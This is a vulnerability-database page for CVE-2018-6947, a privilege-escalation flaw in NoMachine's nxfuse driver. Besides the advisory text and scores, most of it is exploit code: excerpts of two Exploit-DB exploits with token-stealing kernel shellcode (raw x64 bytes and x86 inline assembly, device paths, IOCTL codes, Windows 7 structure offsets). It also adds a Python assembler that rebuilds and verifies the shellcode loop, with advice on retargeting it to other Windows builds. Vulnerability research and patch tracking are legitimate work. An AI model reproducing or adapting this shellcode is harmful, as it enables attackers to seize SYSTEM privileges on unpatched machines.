CVE-2018-6947
Published: 2018-02-28
Priority: P3 · 44 · CVSS 3.0: 7.8 high
Exploit available · EPSS: 3.21% (86.6th percentile)
An uninitialised stack variable in the nxfuse component that is part of the open-source DokanFS library shipped with NoMachine 6.0.66_2 and earlier allows a local, low-privileged user to gain elevation of privilege on Windows 7 (32- and 64-bit), and to cause a denial of service on Windows 8 and 10.
Affected
1 range
| Vendor | Product | Version range | Fixed in |
|---|---|---|---|
| nomachine | nomachine | <= 6.0.66_2 | — |
CVSS provenance
| Source | CVSS version | Score | Severity | Vector |
|---|---|---|---|---|
| NVD | 3.0 | 7.8 | HIGH | CVSS:3.0/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H |
| NVD | 2.0 | 7.2 | HIGH | AV:L/AC:L/Au:N/C:C/I:C/A:C |
No detection rules found.
Exploit-DB: NoMachine < 6.0.80 (x64) - 'nxfuse' Privilege Escalation (CVE-2018-6947, published 2018-02-22)

```python
from ctypes import *
from ctypes.wintypes import *
import struct
import sys
import os

# Win32 constants for allocating the shellcode page and opening the device
MEM_COMMIT = 0x00001000
MEM_RESERVE = 0x00002000
PAGE_EXECUTE_READWRITE = 0x00000040
GENERIC_READ = 0x80000000
GENERIC_WRITE = 0x40000000
OPEN_EXISTING = 0x3
STATUS_INVALID_HANDLE = 0xC0000008

# Token-stealing shellcode; the offsets are Windows 7 x64 structure layouts
shellcode_len = 90
s = ""
s += "\x65\x48\x8B\x04\x25\x88\x01\x00"  # mov rax, gs:[0x188]       ; KPCR.Prcb.CurrentThread (KTHREAD)
s += "\x00"                              # (last byte of the 9-byte gs-relative mov)
s += "\x48\x8B\x40\x70"                  # mov rax, [rax + 0x70]     ; KTHREAD.ApcState.Process (EPROCESS)
s += "\x48\x8B\x98\x90\x02\x00\x00"      # mov rbx, [rax + 0x290]    ; EPROCESS.InheritedFromUniqueProcessId
s += "\x48\x8B\x80\x88\x01\x00\x00"      # Loop1: mov rax, [rax + 0x188] ; EPROCESS.ActiveProcessLinks.Flink
s += "\x48\x2D\x88\x01\x00\x00"          # sub rax, 0x188            ; back to the EPROCESS base
s += "\x48\x39\x98\x80\x01\x00\x00"      # cmp [rax + 0x180], rbx    ; EPROCESS.UniqueProcessId == parent pid?
s += "\x75\xEA"                          # jne Loop1
s += "\x48\x89\xC1"                      # mov rcx, rax              ; rcx = parent process EPROCESS
# ... (listing continues on Exploit-DB)
```
Exploit-DB: NoMachine < 6.0.80 (x86) - 'nxfuse' Privilege Escalation (CVE-2018-6947, published 2018-02-22)

```c
#define DEVICE  L"\\\\.\\nxfs-709fd562-36b5-48c6-9952-302da6218061"
#define DEVICE2 L"\\\\.\\nxfs-net-709fd562-36b5-48c6-9952-302da6218061{709fd562-36b5-48c6-9952-302da6218061}"
#define IOCTL    0x00222014
#define IOCTL2   0x00222030
#define OUT_SIZE 0x90
#define IN_SIZE  0x10

/* Windows 7 x86 structure offsets used by the token-stealing stub */
#define KTHREAD_OFFSET  0x124   /* fs:[0x124] = KPCR.PrcbData.CurrentThread */
#define EPROCESS_OFFSET 0x050   /* KTHREAD.ApcState.Process */
#define PID_OFFSET      0x0b4   /* EPROCESS.UniqueProcessId */
#define FLINK_OFFSET    0x0b8   /* EPROCESS.ActiveProcessLinks */
#define TOKEN_OFFSET    0x0f8   /* EPROCESS.Token */
#define SYSTEM_PID      0x004
#define PARENT_PID      0x140   /* EPROCESS.InheritedFromUniqueProcessId */

__declspec(naked) VOID TokenStealingShellcode()
{
    __asm {
        xor eax, eax;
        mov eax, fs:[eax + KTHREAD_OFFSET];   ; current KTHREAD
        mov eax, [eax + EPROCESS_OFFSET];     ; current EPROCESS
        mov esi, [eax + PARENT_PID];          ; get parent pid
    Loop1:
        mov eax, [eax + FLINK_OFFSET];        ; next entry in the ActiveProcessLinks list
        sub eax, FLINK_OFFSET;                ; back to the EPROCESS base
        cmp esi, [eax + PID_OFFSET];          ; is this the parent process?
        jne Loop1;
        mov ecx, eax;                         ; ecx = parent EPROCESS
        ; ... (listing continues on Exploit-DB)
    }
}
```
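The `jne Loop1` in the x64 stub is hand-encoded as `\x75\xEA`, while the x86 version leaves the same loop to MASM's label resolution. The following added example, which is not part of either Exploit-DB listing, rebuilds the x64 loop from labelled instructions, computes the rel8 displacement the way an assembler does, and checks the result against the bytes on this page. The field names in its comments are the Windows 7 x64 structure offsets the shellcode depends on; `PAGE_LISTING` is the page's byte string reassembled for comparison, and the `Instr` tuple format is this example's own convention.

```python
"""Added example (not from the Exploit-DB listings): a two-pass label
resolver for the x64 token-stealing loop on this page. It encodes the
`jne Loop1` rel8 displacement the way MASM does for the x86 listing and
checks the result against the hand-encoded bytes."""
from typing import Dict, List, Optional, Tuple, Union

# (label, encoding, comment). A branch is written symbolically as
# ("jcc", opcode_byte, target_label) and resolved in the second pass.
Branch = Tuple[str, int, str]
Instr = Tuple[Optional[str], Union[bytes, Branch], str]

# Windows 7 x64 offsets, as used by the listing above.
X64_TOKEN_STEAL_LOOP: List[Instr] = [
    (None,    b"\x65\x48\x8B\x04\x25\x88\x01\x00\x00", "mov rax, gs:[0x188]    ; KPCR.Prcb.CurrentThread"),
    (None,    b"\x48\x8B\x40\x70",                     "mov rax, [rax+0x70]    ; KTHREAD.ApcState.Process"),
    (None,    b"\x48\x8B\x98\x90\x02\x00\x00",         "mov rbx, [rax+0x290]   ; InheritedFromUniqueProcessId"),
    ("Loop1", b"\x48\x8B\x80\x88\x01\x00\x00",         "mov rax, [rax+0x188]   ; ActiveProcessLinks.Flink"),
    (None,    b"\x48\x2D\x88\x01\x00\x00",             "sub rax, 0x188         ; back to EPROCESS base"),
    (None,    b"\x48\x39\x98\x80\x01\x00\x00",         "cmp [rax+0x180], rbx   ; UniqueProcessId == parent?"),
    (None,    ("jcc", 0x75, "Loop1"),                  "jne Loop1"),
    (None,    b"\x48\x89\xC1",                         "mov rcx, rax           ; rcx = parent EPROCESS"),
]

# The page's bytes exactly as its Python listing concatenates them,
# including the split first instruction, for comparison.
PAGE_LISTING = (
    b"\x65\x48\x8B\x04\x25\x88\x01\x00" + b"\x00"
    + b"\x48\x8B\x40\x70"
    + b"\x48\x8B\x98\x90\x02\x00\x00"
    + b"\x48\x8B\x80\x88\x01\x00\x00"
    + b"\x48\x2D\x88\x01\x00\x00"
    + b"\x48\x39\x98\x80\x01\x00\x00"
    + b"\x75\xEA"
    + b"\x48\x89\xC1"
)


def size_of(enc: Union[bytes, Branch]) -> int:
    """A short conditional jump is always opcode + rel8 = 2 bytes."""
    return 2 if isinstance(enc, tuple) else len(enc)


def assemble(instrs: List[Instr]) -> bytes:
    """Pass 1 assigns an offset to every label; pass 2 emits the bytes and
    encodes each rel8 branch relative to the end of the jump instruction."""
    labels: Dict[str, int] = {}
    off = 0
    for label, enc, _ in instrs:
        if label is not None:
            labels[label] = off
        off += size_of(enc)
    out = bytearray()
    for _, enc, _ in instrs:
        if isinstance(enc, tuple):
            _, opcode, target = enc
            rel = labels[target] - (len(out) + 2)   # relative to the next instruction
            if not -128 <= rel <= 127:
                raise ValueError(f"{target!r} is {rel} bytes away, outside rel8 range")
            out += bytes([opcode, rel & 0xFF])
        else:
            out += enc
    return bytes(out)


def rel8_target(code: bytes, jcc_offset: int) -> int:
    """Decode where a Jcc rel8 at jcc_offset lands (sign-extends the displacement)."""
    disp = code[jcc_offset + 1]
    disp = disp - 0x100 if disp & 0x80 else disp
    return jcc_offset + 2 + disp


def listing(instrs: List[Instr]) -> List[str]:
    """Offset-annotated listing, for checking the loop head by eye."""
    code = assemble(instrs)
    rows, off = [], 0
    for label, enc, comment in instrs:
        n = size_of(enc)
        tag = f"{label}:" if label else ""
        rows.append(f"{off:04x} {tag:7}{code[off:off + n].hex(' '):28} {comment}")
        off += n
    return rows


if __name__ == "__main__":
    print("\n".join(listing(X64_TOKEN_STEAL_LOOP)))
    code = assemble(X64_TOKEN_STEAL_LOOP)
    print("matches page listing:", code == PAGE_LISTING)
    print("jne at 0x28 lands at offset", hex(rel8_target(code, 0x28)))
```

Running it prints the loop with offsets and confirms that `0xEA` (-22) from the byte after the `jne` lands on the `mov rax, [rax+0x188]` at offset 0x14, i.e. the `Loop1` head. If the walk is retargeted to a different Windows build, change the offsets in the table and re-run rather than hand-patching the displacement; the range check will refuse a branch that no longer fits in one signed byte.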
No writeups or analysis indexed.
References
https://www.exploit-db.com/exploits/44167/
https://www.exploit-db.com/exploits/44168/
https://www.fidusinfosec.com/nomachine-road-code-execution-without-fuzzing-cve-2018-6947/
https://www.nomachine.com/SU02P00194
https://www.nomachine.com/SU02P00195
https://www.nomachine.com/TR02P08408